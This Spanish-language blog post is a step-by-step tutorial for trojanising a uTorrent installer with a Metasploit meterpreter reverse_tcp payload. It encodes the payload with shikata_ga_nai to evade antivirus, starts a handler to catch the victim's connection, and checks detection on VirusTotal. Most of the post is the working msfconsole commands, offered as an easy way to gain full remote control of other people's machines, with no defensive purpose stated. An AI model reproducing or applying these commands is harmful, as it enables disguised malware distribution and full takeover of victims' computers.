Hola que tal otra entrada, esta vez viene una realizada por g1iore3y87 el cual muestra una de las mil maneras de vulnerar los antivirus, como saben tenemos aqui en el blog mas entradas haciendo uso de Python donde Sanko lo demostro.
Al utilizar metasploit es posible fusionar una sesión de meterpreter a un exe sin ser detectado por los antivirus, ademas esto permite vulnerar equipos y obtener una sesion remota de meterpreter con la cual se puede obtener el completo control de la maquina vulnerada.
1.- Primero vamos a iniciar el servicio de metasploit (si no lo tienes iniciado) para ello vamos a: Aplicaciones -> Kali Linux -> System Services -> Metasploit -> community / pro start.
2.- Iniciado el servicio y usando la misma terminal, tecleamos el siguiente comando: msfconsole. El cual nos dara la siguiente terminal.
3.- Ahora seleccionamos el exe que usaremos como plantilla, en mi caso usare Utorrent para windows.
4.- Ahora asignaremos el payload a usar y los parametros quedando algo asi:
use payload/windows/meterpreter/reverse_tcp -> payload a usar
Código: [Seleccionar]
set LHOST 192.168.15.118 ->aqui tu ip
set LPORT 4445 ->aqui el puerto que prefieras
```**5.-** Ahora con el comando generate iniciaremos con la fusion de nuestro meterpreter.
Código: [\[Seleccionar\]](https://www.blogger.com/null)
generate -e x86/shikata_ga_nai -i 132 -x /root/Burlar/uTorrent.exe -k -t exe -f /root/Burlar/uTorrent1.exe
Quedando todo como en la imagen (no olvides reemplazar la direccion del exe por la que uses):
![](http://4.bp.blogspot.com/-AFWjVHbOcUI/U6jbHwZrXSI/AAAAAAAACI8/ra_Zv0NZfoE/s1600/generate.png)
**6.-** Ahora toca levantar el handler para que este quede a la espera de la coneccion de nuestro archivo infectado.
Código: [\[Seleccionar\]](https://www.blogger.com/null)
use multi/handler
set payload windows/meterpreter/reverse_tcp ->payload utilizado
set lhost 192.168.15.118 -> nuestra ip
set lport 4445 ->puerto que elejimos
exploit ->iniciar el handler
Quedando como en la siguiente imagen:
![](http://3.bp.blogspot.com/-mL_RUud_M6w/U6jgAc8OMnI/AAAAAAAACJM/kYZFAQ_h2uo/s1600/handler.png)
**7.-** Ahora revisaremos que tan efectivo fue nuestro trabajo
Resultado [Virus total](https://www.virustotal.com/es/file/5c8f11711f97079cdb54de8dbca9a1b6cadd9d17a168053b1307a6ff946a44da/analysis/1403573490/)
![](http://4.bp.blogspot.com/-pgR12nj701g/U6jioRS-nxI/AAAAAAAACJY/G8GUb_yqAFE/s1600/resultado+virus.png)
**8.-** Ahora para probar que si funciona nuestro archivo infectado dejo un video haciendo
la prueba de su uso.
Pues como puedes ver es muy facil asi que si te gusto no olvides comentar.
Saludos y que tengas un buen dia atte: [**g1iore3y87**](http://jeovanireyes.blogspot.mx/2014/06/burlando-antivirus-sin-morir-en-el.html)